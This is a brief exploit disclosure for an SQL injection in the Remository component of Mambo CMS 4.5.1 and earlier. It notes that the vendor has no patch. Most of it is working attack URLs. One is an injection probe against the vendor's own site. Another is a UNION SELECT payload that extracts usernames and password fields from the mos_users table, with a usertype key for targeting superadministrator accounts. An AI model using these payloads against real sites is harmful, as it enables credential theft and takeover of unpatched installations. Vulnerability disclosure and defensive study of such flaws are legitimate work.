Vendor www.mamboportal.com Message from vendor : Mambo is one of the most powerful Open Source Content Management Systems on the planet. It is used all over the world for everything from simple websites to complex corporate applications. Mambo is easy to install, simple to manage, and reliable. Bug name : SQL injection Version : lastest Version 4.5.1(1.0.9) and lower. Exploit : http://www.mamboportal.com/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/* You can exploit from the table "mos_users" with the query below http://www.mambosite.com/index.php?option=com_remository&Itemid=[id]&func=selectfolder&filecatid=[id]%20and%201=0%20union%20all%20select%201,2,3,4,username,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20mos_users%20where%20usertype=0/* with the values of usertype : 0 = superadministrator 1 = administrator 2 = editor 3 = user 5 = publisher 6 = manager Vendor feedback : Not yet Vendor patch : Not yet khoai www.xfrog.org
